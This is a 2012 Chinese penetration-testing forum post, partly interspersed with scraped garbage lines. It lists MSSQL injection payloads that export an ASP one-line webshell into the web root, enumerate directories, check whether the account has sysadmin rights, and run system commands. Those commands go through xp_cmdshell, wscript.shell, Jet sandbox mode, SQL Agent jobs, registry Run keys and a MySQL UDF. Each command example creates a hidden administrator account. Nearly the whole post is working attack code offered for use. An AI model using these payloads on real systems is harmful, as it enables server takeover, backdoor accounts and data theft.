中国网络渗透测试联盟
标题:
mssql实用命令及导出一句话
[打印本页]
作者:
admin
时间:
2012-9-13 17:49
标题:
mssql实用命令及导出一句话
MSSQL语句导出一句话木马
' c) g7 @( h. d
首先确定网站的WEB路径
9 G' ~% Z; P+ q
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
! o) l) W& f% O7 i! R* J
8 L$ ~! @" s6 }& e
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
, ?+ W) ?9 h; h- e! l# P
//将一句话木马插入表中
% y& r! g* D" p. H5 L8 I% w& l
9 L/ N* H% z" }
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
& x0 E: }3 V9 P9 l( f- G
//导出一个ASP文件
0 p# a: n" ^4 I. k+ B
; _- v- m" x: m' F: q3 C# G
7 _" R- ]8 p; u, t* W$ w
关于MSSQL列目录
' b8 @7 s' S! ?( w: ~) b
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
0 q3 j# I6 X8 f$ V
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
7 m. @" y+ Z+ `4 M( q& a7 F
8 j1 h+ L, g- y! N4 P( q
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
5 R, a4 V3 E4 d& M3 o0 M7 L, Z
. ]" u1 @. ^) K% u
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
* |. \! a8 }+ f+ z. q) p
2 ^0 p9 a$ c% ?. d/ y
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
% }% C/ R/ ]7 J# J* K0 |
3 ?% j# S% p$ t2 l$ I6 i
$ z" ?. C; I0 v- k, c6 l" S
数据库版本和权限查看
& B; X( Q1 g0 e
and 1=(select @@VERSION) //查看详细的数据库信息.
% z' f' h6 q+ R4 F, @, i
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
3 R8 ^) r7 R( n: K; c
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
' N, j5 m) c; P, D
! p+ p+ B& d% l: v; C! z0 i' o: T; t
2 h' H9 b: h/ `- |; ~6 ^! w
1.利用xp_cmdshell执行命令
& @( L$ y/ p/ ?1 E! x5 t+ ^
exec master..xp_cmdshell 'net user rfire 123456 /add'
! x7 v- A" @8 x. U/ _, x4 v
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
7 k( p1 T9 s* @+ o9 W+ @; k
( X# w' P; O2 P" {; v
恢复xp_cmdshell存储过程
$ z- S" Z9 G% F8 W: W1 z
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
, J& f6 X, j% n: E: S
9 x3 i7 S4 X& @( N
4 ~) U! n( Z/ I# b% X% S2 L
2.利用SP_OAcreate和SP_OAMETHOD执行命令
4 B+ o% B2 g: ~6 _" G# Y
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
9 y0 B# l* z' S5 e0 K# `
DECLARE @shell INT //建立一个@shell实体
! l6 A/ b2 x9 x
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
; x0 i$ c& V' e- i4 ]
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
1 y) _) P; m) {' V& t, ~
5 b' O1 V. x) S0 c
- Y7 h$ Q0 G* f2 L+ W. \
3.利用沙盒模式
* e ~3 o* I3 o
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
2 U/ k8 r" E1 p5 E
开启沙盒模式:
0 A; o/ s% Q# `
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
* h, }0 N8 n. p+ C+ Q* y
$ [6 ?8 X- L, V+ H7 |9 E
执行命令:
" d' l4 q n B1 E# w! B B" j
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
2 R6 _3 ?% Q" e' g
1 _; L% l, o7 U, v- W
* _/ @2 s2 z9 x7 ^4 R' P# B
4.利用SQL代理执行命令
I" u8 ?7 s) l. H
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
# ?1 q3 O4 C; D( W+ g
+ @" r) G& v; T/ P8 E+ S
执行命令:
& l8 d" X3 e( P
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
- V5 ~: E3 h6 p
exec sp_add_job 'x'
0 T' d" Z* G+ b& r; u7 ~
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
7 c7 T3 y) }7 a/ p
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
2 b# X7 A2 L) x3 r7 Z
( w! Q7 E. X/ L" e- Q/ ~ R
, m7 W- t' m7 p
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
& O# F8 M- G, ~7 N8 G) n
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
( A( K% P9 Y. j3 N- y, D4 }
. C( L% h/ s' q9 |
& {, m0 ? k6 {( z8 F @" ~5 l- w
6.MYSQL的命令执行
; m/ Q& A Y+ V; X ]
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
. q& ]8 E A+ R% {; ?+ [, A
首先要在su.php下导出c:\windows\udf.dll
: D+ d5 w0 i6 G8 L
导出后执行创建自定义函数命令:
# {- a0 r1 |! c1 ^) ?2 ]
Create Function cmdshell returns string soname 'udf.dll'
$ Y0 N3 V. j# U5 N, k% T' i e
执行命令
) w' L" |- W5 r6 T3 j( n
select cmdshell('net user rfire 123456 /add')
/ X" A& i. K# ?4 j. o" I& [; o; U
执行后删除函数 drop function cmdshell
5 J( b2 l s6 k
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2